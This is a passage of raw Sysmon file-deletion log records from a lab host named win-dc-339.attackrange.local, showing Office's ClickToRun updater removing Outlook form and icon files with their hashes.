Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\RCLRPT.CFGMD5=38F190ECFF3196728726A64B21F069B2,SHA256=AD4A972234CAD2001EA5871E2FECF6359E46BF36092743D199B97109AB975F96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\POSTS.ICOMD5=524E7C620D3D272B094FC4A94076868D,SHA256=6E8FFF4884C9EED6635E35EE28CA5F661DE54CEC84B5C413BDFCB01DD730FF50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\POSTL.ICOMD5=68CF82220073A3EB35F81C40310A5B45,SHA256=D307576E58CB182C783654109013BC337337178AEE67DC23F5DC572BA7AEC17A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\POSTITS.ICOMD5=4E723E5C18A1EB4755933F089B347E33,SHA256=FFF6AF00871C0DF7ED0ECBB714F7FAAA6BF49CF90B307044D450A657F2479ECA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\POSTITL.ICOMD5=A7947B1675701F2247921CF4C2B99A78,SHA256=A7A757115B59922DC575A7D05969A49B6686B3170E8F9D4E47DC940321CBF498,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\POSTIT.CFGMD5=D1B7A751C6269553B97B84C422F7E8D5,SHA256=FBF0D0191B8597253CCA76351DF0FAEDA412274BC4DC659E107A9B83CE1EBE74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\POST.CFGMD5=A0F44EE99005200DA24A6E8F9A49581D,SHA256=646F399C56D0C63E6D99218662B09559B6B73348EA2FAEC7582C74AED381B859,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\OOFTMPL.CFGMD5=E7CB3B7332176CF5D8806540388088BE,SHA256=21D6F1F0564A04F3C6D81109F0430DCF38F6008FA24D5BBBC7538A27F1FEA98B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\OOFS.ICOMD5=6149FCE3263281D90C09DAFF735BFB07,SHA256=C1BCD2C0BA5269D2F13FCA2F860400C49CB86E7BBF067E3B9DEEF1EAC4F0121E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\OOFL.ICOMD5=D45790E860883123F276DFC102C7C962,SHA256=0EF50ABC2FBB9FCE963B2CF9B630BC719138F5DAE1426C6632BA8C792166E551,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\OMSSMS.CFGMD5=95EDA95AF2A7BCE0C20591704B47C086,SHA256=CB4AF622A654B0EE2595F67D012CB04986EBE2761F0080CFF810D0B34202FCB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\OMSMMS.CFGMD5=6BD5BA277195E6DBAB7C7308413CFE71,SHA256=BDD8CD28A581ED2CE73D22CD6480C863B4977D5FB0201F6D38C4D9BB964065C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\NOTES.ICOMD5=58FE758927AF42147B12D51D3553DEB7,SHA256=C2EE7BB2633263B208B646C503B3FCCC6FE7103CDCFBA86A1D35FEB0150774F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\NOTEL.ICOMD5=18B67864B02A85500C56FF7BD39DBD3D,SHA256=386513A667970143B930471BDF3CFE24102B140DA6F56E7098B30BD5D37C6A21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\NOTE.CFGMD5=7DBA7836641CC1A874DD7F0BDCD6C063,SHA256=1CCAC3A1F0D5FFADAE6A8E2D1F47CAAD07C5AD98D17E2D39874EC3AED33B9BEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\MMSS.ICOMD5=67707C2968CAD3C731CF966A29BCFFB5,SHA256=49C2AAB991F6DCD77FD5D643F28E8BCEFF4A4446AD6B0DD345C46FCF03418FB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\MMSL.ICOMD5=DC6D80E6DB0603675F18BD3A1FBAB1ED,SHA256=765C3F9C4F21AB9C0B89BC38363266D3D191B3A90E9CD9AF3C82405BB79F14FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\IPMS.ICOMD5=F7E2C87A0D78E48C1DBCCEA45CD96C6E,SHA256=53B4D14550239622C148877A7FC872E83546428A9371A3CC2D00E86221DE6D63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\IPML.ICOMD5=93A654632A354694B9821A2AADBE94EE,SHA256=21F104B8AF374057BBDD09DB51D7012C1BC1DC44C44C72077BF7FC3AD4385FE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\IPM.CFGMD5=43DA0536F2A498B41AA3A53501188D29,SHA256=E7CD8EBE5EADEE06375EB77997A6C0646E3F39CDC21934BC5BB5306D40B20AF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\INFOMS.ICOMD5=9643C5B7252A4042A6185D2C77284BD4,SHA256=59EA1B371E7A6CEDC15B011A22AD8C76E98DAA5BDC4A9B19A443B89F22689349,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\INFOML.ICOMD5=26A34EB74C76550280BC70F9C1BA3103,SHA256=D4913F6A1A023F30DAAEA3AD96A5A98EDBFA6287ED1652E04E60CF8392DE0714,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\INFOMAIL.CFGMD5=9520EB5392809F95ED77A1D523C249F4,SHA256=AAEF277259147ED24517CD1CDE54549731C8920F26110134F3C0B2F179D8482F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\EXITEMS.ICOMD5=F4BEB03A4C6D3E1DC83E9D6A4E634E4C,SHA256=C7FE59E208349B99E94D2DFA26BD0E4B40C71DE5BF92384F041BE5C041B4088E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\EXITEML.ICOMD5=DD2DE9BF23B2C2036CF9A8ECB9002C5B,SHA256=EC0A7791F804C7A453E995B77A0B211CB8326F657BE13A44C1CC7B54342835CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\EXITEM.CFGMD5=328BFA21C8BF0F76CFBE27D4871DA446,SHA256=F0B32B336CB5520A71673507F780F30E43E9DF5FF34CDE98C43C8E3F9B79D11A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\DOCS.ICOMD5=BA634B9B7465A82AE9A94585A300DB73,SHA256=A0D047BC15326173CB34B78A5FA283EB750F7078E0C6987D982DB016A37E83CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\DOCL.ICOMD5=32310257791C5B66CF32566D3C6EDE13,SHA256=DB24EBB5E3509594D5415A4509C73D4E7B3995D98D8E79B6692C57992DEA813A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\DOC.CFGMD5=0490F1A0EF2897E0DE9BB708329EFB03,SHA256=0984A4E50E69A4963B3725452B350BAD2BAAD432BD897425E39259304EF68A44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\DISTLSTS.ICOMD5=2417A383D3F2EFFEE2061C07360954F2,SHA256=052CAB019E3C2F201E09871116780475A91CBCFF0DE03F2479B48FF56B2C70C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\DISTLSTL.ICOMD5=BB081465800FE05C26780FF7B4C49403,SHA256=2651BEBB19DAFDB001CC40F367E92E6E3B4293E1C169A395A6863282D153560B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\DISTLIST.CFGMD5=350308A79DC778334432A9BBE84A60CF,SHA256=032DB0C99BB26A033E3C2AA417AE3D22A3C2AF6CAADFABFFADAD1A63E4495E99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\CONTACTS.ICOMD5=3FBBA498DCFADEEB0230354DE63CAB08,SHA256=3599F6E04E689E0A1BD1A3E9CD8C8360FD7A436B0C9716DFC9BC555A939C83C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\CONTACTL.ICOMD5=7D839C56D081DBED770887AE58CAC377,SHA256=5E89277E0301E1B53307A373C5DED5EA976AA5602C66F01CB07FE72F9AB842E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\CONTACT.CFGMD5=C717D95EA9B5261E666A81D219EAA3A1,SHA256=B2237EEFC900034E95A5D4BAB9E21B90459BCB2788F6ACCE1FFC75DB2E93DB40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\CONFLICT.ICOMD5=7D1B6A346E5E04B97D71C44F6C25D108,SHA256=3B490D17291AFA068729554B9E77D281EA0B0405265787281D31B356D6C10F29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\CNFRES.CFGMD5=DE7C3097A2E5CBD2B2F1C02F750DCA70,SHA256=8731DCC1C5824B2F15EA2A049146269EE5F56EC554BC6650341B2968ACF8B440,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\CNFNOT.ICOMD5=E3E891DB3AC74767CC42507B17681911,SHA256=2DDD3F23F25D7033DC7F65DCA6BA1844C88E4E54875DC51671C7C4C4661E2F04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\CNFNOT.CFGMD5=93E2076BD7065A14FE1239E96BD75090,SHA256=E55C5F4DD61476F1161A07D6FC30454C6646CC540715971E4B474C0AC3299BA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\APPTS.ICOMD5=3B9EE11AFB2D2EF4763F63310C1B6307,SHA256=266EE1D5A5ACF170EAF83CDCA9B2C4E96B19A286395DB2A178ABC3C25A72A4DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\APPTL.ICOMD5=986FB2E4B198A72B3DE74A4B2AA3E8B9,SHA256=8586970CDC62EFB65137C64C2B3550193F53F446AC6724309CE62BA0F4115AA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\APPT.CFGMD5=B39934AEF6E21F775C268FA135FD837B,SHA256=B110673A99C92F6991BD4C33091E2A109D160D5632C385C0AC11023481FDBEF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\ACTIVITY.CFGMD5=CEEE3139492F9AF81E7527E77B4914FD,SHA256=AE434FC8502EA4393C27ED1A75996DA7C67C420CFBB9ED47E54A9EFAE1EA1F3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\ACTIVITS.ICOMD5=55C93812C47BB92AA469381C1DAD6D78,SHA256=05F366FCE128968439C74C862FCEF0DA2B9D09142CFEBD938D22D7DB8C7C1DB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\ACTIVITL.ICOMD5=67F659CDB0EE35FD32FFC3D19F2EC7EE,SHA256=FDABE4D4227DC5F33FF6CF5D48D6AB5990C8DCD443E1AA22BDA62FEEB26C41CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 